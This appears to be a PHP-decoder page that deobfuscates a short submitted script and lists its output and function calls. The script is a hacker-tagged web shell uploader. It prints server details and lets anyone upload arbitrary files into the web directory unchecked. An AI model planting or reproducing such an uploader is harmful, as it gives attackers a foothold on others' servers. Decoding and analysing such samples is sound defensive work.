Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php echo base64_decode("UGFrIEhheG9y"); echo "<br>".php_uname()."<br>"; echo "<form m..
Decoded Output download
b'Pak Haxor'<br>Linux localhost 2.4.21-0.13mdk #1 Fri Mar 14 15:08:06 EST 2003 i686<br><form method='post' enctype='multipart/form-data'>
<input type='file' name='idx'><input type='submit' name='upload' value='upload'>
</form>
Did this file decode correctly?
Original Code
<?php
echo base64_decode("UGFrIEhheG9y");
echo "<br>".php_uname()."<br>";
echo "<form method='post' enctype='multipart/form-data'>
<input type='file' name='idx'><input type='submit' name='upload' value='upload'>
</form>";
if($_POST['upload']) {
if(@copy($_FILES['idx']['tmp_name'], $_FILES['idx']['name'])) {
echo "sukses";
} else {
echo "gagal";
}
}
?>
Function Calls
php_uname | 1 |
base64_decode | 1 |
Stats
MD5 | 25201d4142d5b2ddd507ad84819c2810 |
Eval Count | 0 |
Decode Time | 117 ms |